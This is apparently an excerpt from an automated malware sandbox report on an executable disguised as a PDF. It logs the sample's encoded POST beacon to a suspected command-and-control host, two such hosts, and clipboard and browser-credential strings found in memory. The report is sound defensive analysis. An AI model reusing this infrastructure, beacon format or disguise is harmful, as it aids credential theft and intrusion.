Source: unknown | HTTP traffic detected: POST /bdk6/ HTTP/1.1
    Host: www.carsten.studio
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: en-us
    Connection: close
    Content-Length: 205
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.carsten.studio
    Referer: http://www.carsten.studio/bdk6/
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
    Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 5a 46 4b 42 70 61 6a 66 62 30 32 46 2f 50 2b 6b 54 6b 53 74 44 55 45 44 4a 33 51 61 44 6b 2f 47 54 50 32 6f 38 76 36 33 66 45 34 64 33 56 42 65 77 67 36 59 4c 54 77 36 36 52 44 44 54 38 76 78 78 72 6d 45 74 75 65 4e 5a 65 2f 50 6d 46 76 4c 66 50 52 34 33 38 63 67 46 79 77 78 36 69 70 4d 50 38 50 32 33 63 71 4e 34 70 75 4e 46 50 78 31 42 65 34 48 55 70 70 73 70 68 36 61 57 70 71 4a 33 53 4a 41 36 72 4b 51 61 4e 51 66 69 6e 5a 63 57 4c 54 30 70 54 68 2b 47 59 31 31 4c 5a 51 42 34 59 4b 69 4d 49 70 58 47 6a 32 2b 63 6b 61 59 62 69 63 71 4f 51 3d 3d
    Data Ascii: 5lf8fv8H=CoChSON0L06JZFKBpajfb02F/P+kTkStDUEDJ3QaDk/GTP2o8v63fE4d3VBewg6YLTw66RDDT8vxxrmEtueNZe/PmFvLfPR438cgFywx6ipMP8P23cqN4puNFPx1Be4HUppsph6aWpqJ3SJA6rKQaNQfinZcWLT0pTh+GY11LZQB4YKiMIpXGj2+ckaYbicqOQ==
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 19 Nov 2024 02:56:17 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 
6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 
67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 
67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 
67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:55 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 
20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sitioseguro.blog
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sitioseguro.blog/6o0x/
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: upnpcont.exe, 0000000A.00000002.3085844190.00000000039E8000.00000004.10000000.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.0000000003788000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.00000000028A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033YR
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: upnpcont.exe, 0000000A.00000003.2510019101.0000000007745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.00000000035F6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.strato.de
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00396D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00396D07
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00D36D07
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
